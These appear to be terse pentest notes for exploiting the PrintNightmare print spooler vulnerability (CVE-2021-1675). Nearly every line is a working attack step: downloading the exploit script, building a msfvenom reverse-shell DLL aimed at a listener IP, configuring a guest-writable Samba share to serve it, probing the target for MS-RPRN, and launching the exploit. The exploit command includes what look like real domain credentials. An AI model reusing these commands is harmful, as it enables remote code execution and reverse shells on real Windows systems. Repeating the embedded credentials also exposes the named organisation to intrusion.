sudo pip3 uninstall impacket
cd /opt && sudo git clone <https://github.com/cube0x0/impacket> && cd impacket
sudo python3 ./setup.py install

wget <https://raw.githubusercontent.com/cube0x0/CVE-2021-1675/main/CVE-2021-1675.py>
msfvenom -f dll -p windows/x64/shell_reverse_tcp -o /tmp/reverse.dll LHOST=192.168.0.193 LPORT=4444
sudo subl /etc/samba/smb.conf
[global]
    map to guest = Bad User
    server role = standalone server
    usershare allow guests = yes
    idmap config * : backend = tdb
    smb ports = 445

[smb]
    comment = Samba
    path = /tmp/
    guest ok = yes
    read only = no
    browsable = yes
    force user = smbuser

sudo service smbd start
sudo service nmbd start
sudo systemctl status smb

rpcdump.py @192.168.58.10 | grep MS-RPRN

./CVE-2021-1675.py kusahalyk.kz/pentest:Gtyntcn#2021\\$\\[email protected] '\\\\192.168.0.193\\smb\\reverse.dll'

https://www.youtube.com/watch?v=xvG-5SbdXZ8

#Cobalt

GitHub - outflanknl/PrintNightmare